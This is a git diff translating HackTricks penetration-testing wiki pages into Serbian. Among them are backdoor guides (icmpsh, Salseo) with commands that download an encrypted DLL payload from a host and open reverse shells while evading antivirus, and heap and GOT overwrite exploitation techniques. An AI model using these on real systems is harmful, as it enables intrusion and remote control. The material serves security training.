odgovornosti. -a. **Osim ako Licencodavac nije drugačije preuzeo obavezu, u meri u kojoj je to moguće, Licencodavac nudi Licencirani Materijal "kako jeste" i "kako je dostupno", i ne daje nikakve izjave ili garancije bilo koje vrste u vezi sa Licenciranim Materijalom, bilo izričite, implicirane, zakonske ili druge. Ovo uključuje, bez ograničenja, garancije vlasništva, prodajne sposobnosti, pogodnosti za određenu svrhu, nekršenja, odsustva latentnih ili drugih nedostataka, tačnosti, ili prisustva ili odsustva grešaka, bez obzira na to da li su poznate ili otkrivene. Gde odricanja od garancija nisu dozvoljena u potpunosti ili delimično, ovo odricanje se možda neće primeniti na vas.** +a. **Osim ako nije drugačije posebno preuzeto od strane Licencodavca, u meri u kojoj je to moguće, Licencodavac nudi Licencirani Materijal "kako jeste" i "kako je dostupno", i ne daje nikakve izjave ili garancije bilo koje vrste u vezi sa Licenciranim Materijalom, bilo izričite, implicirane, zakonske ili druge. Ovo uključuje, bez ograničenja, garancije vlasništva, prodajne sposobnosti, pogodnosti za određenu svrhu, nekršenja, odsustva latentnih ili drugih nedostataka, tačnosti, ili prisustva ili odsustva grešaka, bez obzira na to da li su poznate ili otkrivene. Gde odricanja od garancija nisu dozvoljena u potpunosti ili delimično, ovo odricanje se možda neće primeniti na vas.** b. **U meri u kojoj je to moguće, u nijednom slučaju Licencodavac neće biti odgovoran prema vama na bilo kojoj pravnoj osnovi (uključujući, bez ograničenja, nemar) ili na drugi način za bilo kakve direktne, posebne, indirektne, slučajne, posledične, kaznene, uzorničke ili druge gubitke, troškove, izdatke ili štete proizašle iz ove Javne Licence ili korišćenja Licenciranog Materijala, čak i ako je Licencodavac bio obavešten o mogućnosti takvih gubitaka, troškova, izdataka ili šteta. Gde ograničenje odgovornosti nije dozvoljeno u potpunosti ili delimično, ovo ograničenje se možda neće primeniti na vas.** @@ -147,9 +147,9 @@ c. Radi izbegavanja sumnje, Licencodavac može takođe ponuditi Licencirani Mate d. Odeljci 1, 5, 6, 7 i 8 opstaju nakon raskida ove Javne Licence. -## Odeljak 7 – Ostali uslovi i odredbe. +## Odeljak 7 – Drugi uslovi i odredbe. -a. Licencodavac neće biti obavezan bilo kojim dodatnim ili različitim uslovima ili odredbama koje ste vi saopštili osim ako nije izričito dogovoreno. +a. Licencodavac neće biti vezan bilo kojim dodatnim ili različitim uslovima ili odredbama koje ste vi saopštili osim ako nije izričito dogovoreno. b. Bilo kakvi dogovori, razumevanja ili sporazumi u vezi sa Licenciranim Materijalom koji nisu ovde navedeni su odvojeni i nezavisni od uslova i odredbi ove Javne Licence. @@ -157,9 +157,9 @@ b. Bilo kakvi dogovori, razumevanja ili sporazumi u vezi sa Licenciranim Materij a. Radi izbegavanja sumnje, ova Javna Licenca ne smanjuje, ne ograničava, ne restriktivno tumači, niti nameće uslove na bilo koju upotrebu Licenciranog Materijala koja bi se mogla zakonito izvršiti bez dozvole prema ovoj Javnoj Licenci. -b. U meri u kojoj je to moguće, ako se bilo koja odredba ove Javne Licence smatra neizvršivom, ona će se automatski reformisati na minimalni stepen potreban da bi bila izvršiva. Ako se odredba ne može reformisati, ona će biti odvojena od ove Javne Licence bez uticaja na izvršivost preostalih uslova i odredbi. +b. U meri u kojoj je to moguće, ako se bilo koja odredba ove Javne Licence smatra neizvršivom, ona će se automatski reformisati na minimalni stepen potreban da bi bila izvršna. Ako se odredba ne može reformisati, ona će biti odvojena od ove Javne Licence bez uticaja na izvršivost preostalih uslova i odredbi. -c. Nijedna odredba ili uslov ove Javne Licence neće biti odustajan i nijedno nepoštovanje neće biti prihvaćeno osim ako nije izričito dogovoreno od strane Licencodavca. +c. Nijedna odredba ili uslov ove Javne Licence neće biti odustajanje i nijedno nepoštovanje neće biti pristano osim ako nije izričito dogovoreno od strane Licencodavca. d. Ništa u ovoj Javnoj Licenci ne predstavlja ili se ne može tumačiti kao ograničenje, ili odricanje od, bilo kojih privilegija i imuniteta koji se primenjuju na Licencodavca ili vas, uključujući od pravnih procesa bilo koje jurisdikcije ili vlasti. ``` diff --git a/src/README.md b/src/README.md index e86a1826c..7b8f36680 100644 --- a/src/README.md +++ b/src/README.md @@ -123,7 +123,7 @@ Naučite tehnologije i veštine potrebne za izvođenje istraživanja ranjivosti, WebSec je **sve-u-jednom bezbednosna kompanija** što znači da rade sve; Pentesting, **Bezbednosne** revizije, Obuke o svesti, Phishing kampanje, Revizije koda, Razvoj eksploata, Outsourcing bezbednosnih stručnjaka i još mnogo toga. -Još jedna zanimljiva stvar o WebSec-u je da, za razliku od industrijskog proseka, WebSec je **veoma siguran u svoje veštine**, do te mere da **garantuje najbolje kvalitetne rezultate**, kako stoji na njihovom sajtu "**Ako ne možemo da hakujemo, ne plaćate!**". Za više informacija pogledajte njihov [**sajt**](https://websec.nl/en/) i [**blog**](https://websec.nl/blog/)! +Još jedna zanimljiva stvar o WebSec-u je da, za razliku od industrijskog proseka, WebSec je **veoma siguran u svoje veštine**, do te mere da **garantuje najbolje kvalitetne rezultate**, kako stoji na njihovoj veb stranici "**Ako ne možemo da hakujemo, ne plaćate!**". Za više informacija pogledajte njihovu [**vеб страницу**](https://websec.nl/en/) i [**blog**](https://websec.nl/blog/)! Pored navedenog, WebSec je takođe **posvećen podržavalac HackTricks.** diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 4a8579657..fb3efcc74 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -868,3 +868,4 @@ - [Cookies Policy](todo/cookies-policy.md) + diff --git a/src/android-forensics.md b/src/android-forensics.md index c4ccaa007..09009851b 100644 --- a/src/android-forensics.md +++ b/src/android-forensics.md @@ -10,11 +10,11 @@ Da biste započeli ekstrakciju podataka sa Android uređaja, mora biti otključa - Proveriti za mogući [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf) - Pokušati sa [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) -## Akvizicija podataka +## Ekstrakcija podataka Kreirajte [android backup koristeći adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) i ekstraktujte ga koristeći [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` -### Ako postoji root pristup ili fizička veza sa JTAG interfejsom +### Ako imate root pristup ili fizičku vezu sa JTAG interfejsom - `cat /proc/partitions` (pronađite putanju do flash memorije, obično je prvi unos _mmcblk0_ i odgovara celoj flash memoriji). - `df /data` (otkrijte veličinu bloka sistema). diff --git a/src/backdoors/icmpsh.md b/src/backdoors/icmpsh.md index 6c48091a3..ecdeafcc4 100644 --- a/src/backdoors/icmpsh.md +++ b/src/backdoors/icmpsh.md @@ -1,31 +1,25 @@ {{#include ../banners/hacktricks-training.md}} -Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) +Preuzmite backdoor sa: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) -# Client side +# Klijentska strana -Execute the script: **run.sh** - -**If you get some error, try to change the lines:** +Izvršite skriptu: **run.sh** +**Ako dobijete neku grešku, pokušajte da promenite linije:** ```bash IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') ``` - -**For:** - +**Za:** ```bash echo Please insert the IP where you want to listen read IP ``` +# **Strana žrtve** -# **Victim Side** - -Upload **icmpsh.exe** to the victim and execute: - +Otpremite **icmpsh.exe** na žrtvu i izvršite: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` - {{#include ../banners/hacktricks-training.md}} diff --git a/src/backdoors/salseo.md b/src/backdoors/salseo.md index 90cf5338c..cca21bcff 100644 --- a/src/backdoors/salseo.md +++ b/src/backdoors/salseo.md @@ -2,41 +2,37 @@ {{#include ../banners/hacktricks-training.md}} -## Compiling the binaries +## Kompajliranje binarnih fajlova -Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code. +Preuzmite izvorni kod sa github-a i kompajlirajte **EvilSalsa** i **SalseoLoader**. Biće vam potreban **Visual Studio** instaliran da biste kompajlirali kod. -Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures). +Kompajlirajte te projekte za arhitekturu Windows mašine na kojoj ćete ih koristiti (Ako Windows podržava x64, kompajlirajte ih za tu arhitekturu). -You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".** +Možete **izabrati arhitekturu** unutar Visual Studio-a u **levom "Build" tabu** u **"Platform Target".** -(\*\*If you can't find this options press in **"Project Tab"** and then in **"\ Properties"**) +(\*\*Ako ne možete pronaći ove opcije, pritisnite na **"Project Tab"** a zatim na **"\ Properties"**) ![](<../images/image (132).png>) -Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable): +Zatim, izgradite oba projekta (Build -> Build Solution) (Unutar logova će se pojaviti putanja do izvršnog fajla): ![](<../images/image (1) (2) (1) (1) (1).png>) -## Prepare the Backdoor +## Pripremite Backdoor -First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**: +Prvo, biće potrebno da kodirate **EvilSalsa.dll.** Da biste to uradili, možete koristiti python skriptu **encrypterassembly.py** ili možete kompajlirati projekat **EncrypterAssembly**: ### **Python** - ``` python EncrypterAssembly/encrypterassembly.py python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt ``` - ### Windows - ``` EncrypterAssembly.exe EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt ``` - -Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.** +U redu, sada imate sve što vam je potrebno da izvršite sve Salseo stvari: **encoded EvilDalsa.dll** i **binary of SalseoLoader.** **Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...** @@ -44,117 +40,86 @@ Ok, now you have everything you need to execute all the Salseo thing: the **enco ### **Getting a TCP reverse shell (downloading encoded dll through HTTP)** -Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa. - +Zapamtite da pokrenete nc kao slušalac za reverznu ljusku i HTTP server da poslužite encoded evilsalsa. ``` SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp ``` +### **Dobijanje UDP reverzibilnog shell-a (preuzimanje kodirane dll preko SMB)** -### **Getting a UDP reverse shell (downloading encoded dll through SMB)** - -Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver). - +Zapamtite da pokrenete nc kao slušača reverzibilnog shell-a, i SMB server da posluži kodirani evilsalsa (impacket-smbserver). ``` SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp ``` +### **Dobijanje ICMP reverz shell-a (kodirana dll već unutar žrtve)** -### **Getting a ICMP reverse shell (encoded dll already inside the victim)** - -**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) - -#### **Disable ICMP Replies:** +**Ovoga puta vam je potreban poseban alat na klijentu da primite reverz shell. Preuzmite:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) +#### **Onemogućite ICMP odgovore:** ``` sysctl -w net.ipv4.icmp_echo_ignore_all=1 #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 ``` - -#### Execute the client: - +#### Izvrši klijenta: ``` python icmpsh_m.py "" "" ``` - -#### Inside the victim, lets execute the salseo thing: - +#### Unutar žrtve, hajde da izvršimo salseo stvar: ``` SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ``` +## Kompajliranje SalseoLoader-a kao DLL koji izvozi glavnu funkciju -## Compiling SalseoLoader as DLL exporting main function +Otvorite SalseoLoader projekat koristeći Visual Studio. -Open the SalseoLoader project using Visual Studio. - -### Add before the main function: \[DllExport] +### Dodajte pre glavne funkcije: \[DllExport] ![](<../images/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -### Install DllExport for this project +### Instalirajte DllExport za ovaj projekat -#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...** +#### **Alati** --> **NuGet Package Manager** --> **Upravljanje NuGet paketima za rešenje...** ![](<../images/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)** +#### **Pretražite DllExport paket (koristeći Browse tab), i pritisnite Instaliraj (i prihvatite iskačući prozor)** ![](<../images/image (4) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -In your project folder have appeared the files: **DllExport.bat** and **DllExport_Configure.bat** +U vašem projektnom folderu pojavili su se fajlovi: **DllExport.bat** i **DllExport_Configure.bat** -### **U**ninstall DllExport +### **De**instalirajte DllExport -Press **Uninstall** (yeah, its weird but trust me, it is necessary) +Pritisnite **Deinstaliraj** (da, čudno je, ali verujte mi, to je neophodno) ![](<../images/image (5) (1) (1) (2) (1).png>) -### **Exit Visual Studio and execute DllExport_configure** +### **Izađite iz Visual Studio i izvršite DllExport_configure** -Just **exit** Visual Studio +Jednostavno **izađite** iz Visual Studio -Then, go to your **SalseoLoader folder** and **execute DllExport_Configure.bat** +Zatim, idite u vaš **SalseoLoader folder** i **izvršite DllExport_Configure.bat** -Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply** +Izaberite **x64** (ako ćete ga koristiti unutar x64 okruženja, to je bio moj slučaj), izaberite **System.Runtime.InteropServices** (unutar **Namespace for DllExport**) i pritisnite **Primeni** ![](<../images/image (7) (1) (1) (1) (1).png>) -### **Open the project again with visual Studio** +### **Ponovo otvorite projekat sa Visual Studio** -**\[DllExport]** should not be longer marked as error - -![](<../images/image (8) (1).png>) - -### Build the solution - -Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library) - -![](<../images/image (10) (1).png>) - -Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64) - -![](<../images/image (9) (1) (1).png>) - -To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear) - -### Test the generated Dll - -Copy and paste the Dll where you want to test it. - -Execute: +**\[DllExport]** više ne bi trebao biti označen kao greška +![](<../images/image (8) (1).png> ``` rundll32.exe SalseoLoader.dll,main ``` +Ako se ne pojavi greška, verovatno imate funkcionalni DLL!! -If no error appears, probably you have a functional DLL!! +## Dobijanje shel-a koristeći DLL -## Get a shell using the DLL - -Don't forget to use a **HTTP** **server** and set a **nc** **listener** +Ne zaboravite da koristite **HTTP** **server** i postavite **nc** **listener** ### Powershell - ``` $env:pass="password" $env:payload="http://10.2.0.5/evilsalsax64.dll.txt" @@ -163,9 +128,7 @@ $env:lport="1337" $env:shell="reversetcp" rundll32.exe SalseoLoader.dll,main ``` - ### CMD - ``` set pass=password set payload=http://10.2.0.5/evilsalsax64.dll.txt @@ -174,5 +137,4 @@ set lport=1337 set shell=reversetcp rundll32.exe SalseoLoader.dll,main ``` - {{#include ../banners/hacktricks-training.md}} diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md index b03deaf4a..8fc60c0cd 100644 --- a/src/banners/hacktricks-training.md +++ b/src/banners/hacktricks-training.md @@ -1,13 +1,13 @@ > [!TIP] -> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +> Učite i vežbajte AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +> Učite i vežbajte GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) > >
> -> Support HackTricks +> Podržite HackTricks > -> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. > >
diff --git a/src/binary-exploitation/arbitrary-write-2-exec/README.md b/src/binary-exploitation/arbitrary-write-2-exec/README.md index 117d2440a..5de6cdb61 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/README.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/README.md @@ -1,3 +1 @@ # Arbitrary Write 2 Exec - - diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md index 7bd874ca8..e85a5604e 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md @@ -4,34 +4,32 @@ ## **Malloc Hook** -As you can [Official GNU site](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html), the variable **`__malloc_hook`** is a pointer pointing to the **address of a function that will be called** whenever `malloc()` is called **stored in the data section of the libc library**. Therefore, if this address is overwritten with a **One Gadget** for example and `malloc` is called, the **One Gadget will be called**. +Kao što možete videti na [Official GNU site](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html), promenljiva **`__malloc_hook`** je pokazivač koji pokazuje na **adresu funkcije koja će biti pozvana** svaki put kada se pozove `malloc()` **smeštena u sekciji podataka libc biblioteke**. Stoga, ako se ova adresa prepiše sa **One Gadget**, na primer, i pozove se `malloc`, **One Gadget će biti pozvan**. -To call malloc it's possible to wait for the program to call it or by **calling `printf("%10000$c")`** which allocates too bytes many making `libc` calling malloc to allocate them in the heap. +Da biste pozvali malloc, moguće je čekati da program to pozove ili **pozivom `printf("%10000$c")`** koji alocira previše bajtova, čime `libc` poziva malloc da ih alocira na heap-u. -More info about One Gadget in: +Više informacija o One Gadget-u u: {{#ref}} ../rop-return-oriented-programing/ret2lib/one-gadget.md {{#endref}} > [!WARNING] -> Note that hooks are **disabled for GLIBC >= 2.34**. There are other techniques that can be used on modern GLIBC versions. See: [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md). +> Imajte na umu da su hook-ovi **onemogućeni za GLIBC >= 2.34**. Postoje druge tehnike koje se mogu koristiti na modernim verzijama GLIBC. Vidi: [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md). ## Free Hook -This was abused in one of the example from the page abusing a fast bin attack after having abused an unsorted bin attack: +Ovo je zloupotrebljeno u jednom od primera sa stranice koja zloupotrebljava napad na brzu kantu nakon što je zloupotrebljen napad na neusmerenu kantu: {{#ref}} ../libc-heap/unsorted-bin-attack.md {{#endref}} -It's posisble to find the address of `__free_hook` if the binary has symbols with the following command: - +Moguće je pronaći adresu `__free_hook` ako binarni fajl ima simbole sa sledećom komandom: ```bash gef➤ p &__free_hook ``` - -[In the post](https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html) you can find a step by step guide on how to locate the address of the free hook without symbols. As summary, in the free function: +[U postu](https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html) možete pronaći vodič korak po korak o tome kako locirati adresu slobodnog hook-a bez simbola. Kao sažetak, u funkciji free: 
gef➤  x/20i free
 0xf75dedc0 <free>: push   ebx
@@ -45,26 +43,26 @@ gef➤  p &__free_hook
 0xf75deddd <free+29>:  jne    0xf75dee50 <free+144>
-In the mentioned break in the previous code in `$eax` will be located the address of the free hook. +Na pomenutom break-u u prethodnom kodu u `$eax` će se nalaziti adresa slobodnog hook-a. -Now a **fast bin attack** is performed: +Sada se vrši **fast bin attack**: -- First of all it's discovered that it's possible to work with fast **chunks of size 200** in the **`__free_hook`** location: +- Prvo je otkriveno da je moguće raditi sa brzim **chunk-ovima veličine 200** na lokaciji **`__free_hook`**: - 
gef➤  p &__free_hook
-  $1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
-  gef➤  x/60gx 0x7ff1e9e607a8 - 0x59
-  0x7ff1e9e6074f: 0x0000000000000000      0x0000000000000200
-  0x7ff1e9e6075f: 0x0000000000000000      0x0000000000000000
-  0x7ff1e9e6076f <list_all_lock+15>:      0x0000000000000000      0x0000000000000000
-  0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000      0x0000000000000000
-
- - If we manage to get a fast chunk of size 0x200 in this location, it'll be possible to overwrite a function pointer that will be executed -- For this, a new chunk of size `0xfc` is created and the merged function is called with that pointer twice, this way we obtain a pointer to a freed chunk of size `0xfc*2 = 0x1f8` in the fast bin. -- Then, the edit function is called in this chunk to modify the **`fd`** address of this fast bin to point to the previous **`__free_hook`** function. -- Then, a chunk with size `0x1f8` is created to retrieve from the fast bin the previous useless chunk so another chunk of size `0x1f8` is created to get a fast bin chunk in the **`__free_hook`** which is overwritten with the address of **`system`** function. -- And finally a chunk containing the string `/bin/sh\x00` is freed calling the delete function, triggering the **`__free_hook`** function which points to system with `/bin/sh\x00` as parameter. +$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook> +gef➤ x/60gx 0x7ff1e9e607a8 - 0x59 +0x7ff1e9e6074f: 0x0000000000000000 0x0000000000000200 +0x7ff1e9e6075f: 0x0000000000000000 0x0000000000000000 +0x7ff1e9e6076f <list_all_lock+15>: 0x0000000000000000 0x0000000000000000 +0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000 + +- Ako uspemo da dobijemo brzi chunk veličine 0x200 na ovoj lokaciji, biće moguće prepisati pokazivač funkcije koja će biti izvršena +- Za to, kreira se novi chunk veličine `0xfc` i spojena funkcija se poziva sa tim pokazivačem dva puta, na taj način dobijamo pokazivač na oslobođeni chunk veličine `0xfc*2 = 0x1f8` u fast bin-u. +- Zatim se poziva funkcija za izmenu u ovom chunk-u da modifikuje adresu **`fd`** ovog fast bin-a da pokazuje na prethodnu funkciju **`__free_hook`**. +- Zatim se kreira chunk veličine `0x1f8` da se povuče iz fast bin-a prethodni beskorisni chunk tako da se kreira još jedan chunk veličine `0x1f8` da se dobije fast bin chunk u **`__free_hook`** koji se prepisuje sa adresom funkcije **`system`**. +- I konačno, chunk koji sadrži string `/bin/sh\x00` se oslobađa pozivom funkcije za brisanje, aktivirajući funkciju **`__free_hook`** koja pokazuje na system sa `/bin/sh\x00` kao parametrom. -## References +## Reference - [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook) - [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md). diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md index ad09ee48e..aca3aa466 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md @@ -2,86 +2,86 @@ {{#include ../../banners/hacktricks-training.md}} -## **Basic Information** +## **Osnovne informacije** ### **GOT: Global Offset Table** -The **Global Offset Table (GOT)** is a mechanism used in dynamically linked binaries to manage the **addresses of external functions**. Since these **addresses are not known until runtime** (due to dynamic linking), the GOT provides a way to **dynamically update the addresses of these external symbols** once they are resolved. +**Global Offset Table (GOT)** je mehanizam koji se koristi u dinamički povezanim binarnim datotekama za upravljanje **adresama spoljašnjih funkcija**. Pošto su te **adrese nepoznate do vremena izvršavanja** (zbog dinamičkog povezivanja), GOT pruža način da se **dinamički ažuriraju adrese ovih spoljašnjih simbola** kada se reše. -Each entry in the GOT corresponds to a symbol in the external libraries that the binary may call. When a **function is first called, its actual address is resolved by the dynamic linker and stored in the GOT**. Subsequent calls to the same function use the address stored in the GOT, thus avoiding the overhead of resolving the address again. +Svaki unos u GOT odgovara simbolu u spoljnim bibliotekama koje binarna datoteka može pozvati. Kada se **funkcija prvi put pozove, njena stvarna adresa se rešava putem dinamičkog linker-a i čuva u GOT**. Naknadni pozivi iste funkcije koriste adresu koja je sačuvana u GOT, čime se izbegava preopterećenje ponovnog rešavanja adrese. ### **PLT: Procedure Linkage Table** -The **Procedure Linkage Table (PLT)** works closely with the GOT and serves as a trampoline to handle calls to external functions. When a binary **calls an external function for the first time, control is passed to an entry in the PLT associated with that function**. This PLT entry is responsible for invoking the dynamic linker to resolve the function's address if it has not already been resolved. After the address is resolved, it is stored in the **GOT**. +**Procedure Linkage Table (PLT)** blisko sarađuje sa GOT i služi kao trampolin za upravljanje pozivima spoljašnjim funkcijama. Kada binarna datoteka **pozove spoljašnju funkciju prvi put, kontrola se prebacuje na unos u PLT koji je povezan sa tom funkcijom**. Ovaj PLT unos je odgovoran za pozivanje dinamičkog linker-a da reši adresu funkcije ako već nije rešena. Nakon što se adresa reši, ona se čuva u **GOT**. -**Therefore,** GOT entries are used directly once the address of an external function or variable is resolved. **PLT entries are used to facilitate the initial resolution** of these addresses via the dynamic linker. +**Dakle,** GOT unosi se koriste direktno kada se adresa spoljašnje funkcije ili promenljive reši. **PLT unosi se koriste za olakšavanje inicijalnog rešavanja** ovih adresa putem dinamičkog linker-a. -## Get Execution +## Dobijanje izvršenja -### Check the GOT +### Proverite GOT -Get the address to the GOT table with: **`objdump -s -j .got ./exec`** +Dobijte adresu GOT tabele sa: **`objdump -s -j .got ./exec`** ![](<../../images/image (121).png>) -Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xADDR_GOT` +Posmatrajte kako nakon **učitavanja** **izvršne datoteke** u GEF možete **videti** **funkcije** koje se nalaze u **GOT**: `gef➤ x/20x 0xADDR_GOT` -![](<../../images/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>) +![](<../../images/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>) -Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: +Koristeći GEF možete **početi** sesiju **debugovanja** i izvršiti **`got`** da vidite got tabelu: ![](<../../images/image (496).png>) ### GOT2Exec -In a binary the GOT has the **addresses to the functions or** to the **PLT** section that will load the function address. The goal of this arbitrary write is to **override a GOT entry** of a function that is going to be executed later **with** the **address** of the PLT of the **`system`** **function** for example. +U binarnoj datoteci GOT ima **adrese funkcija ili** do **PLT** sekcije koja će učitati adresu funkcije. Cilj ovog proizvoljnog pisanja je da **prepiše GOT unos** funkcije koja će biti izvršena kasnije **sa** **adresom** PLT-a **`system`** **funkcije** na primer. -Ideally, you will **override** the **GOT** of a **function** that is **going to be called with parameters controlled by you** (so you will be able to control the parameters sent to the system function). +Idealan scenario je da **prepišete** **GOT** funkcije koja će **biti pozvana sa parametrima koje kontrolišete** (tako da ćete moći da kontrolišete parametre poslati sistemskoj funkciji). -If **`system`** **isn't used** by the binary, the system function **won't** have an entry in the PLT. In this scenario, you will **need to leak first the address** of the `system` function and then overwrite the GOT to point to this address. +Ako **`system`** **nije korišćen** od strane binarne datoteke, sistemska funkcija **neće** imati unos u PLT-u. U ovom scenariju, prvo ćete **morati da iscurite adresu** funkcije `system` i zatim prepisati GOT da pokazuje na ovu adresu. -You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`** +Možete videti PLT adrese sa **`objdump -j .plt -d ./vuln_binary`** -## libc GOT entries +## libc GOT unosi -The **GOT of libc** is usually compiled with **partial RELRO**, making it a nice target for this supposing it's possible to figure out its address ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)). +**GOT libc** se obično kompajlira sa **delimičnim RELRO**, što ga čini dobrim ciljem za ovo pod pretpostavkom da je moguće utvrditi njegovu adresu ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)). -Common functions of the libc are going to call **other internal functions** whose GOT could be overwritten in order to get code execution. +Uobičajene funkcije libc će pozvati **druge interne funkcije** čiji GOT bi mogao biti prepisan kako bi se dobila izvršna kod. -Find [**more information about this technique here**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries). +Pronađite [**više informacija o ovoj tehnici ovde**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries). ### **Free2system** -In heap exploitation CTFs it's common to be able to control the content of chunks and at some point even overwrite the GOT table. A simple trick to get RCE if one gadgets aren't available is to 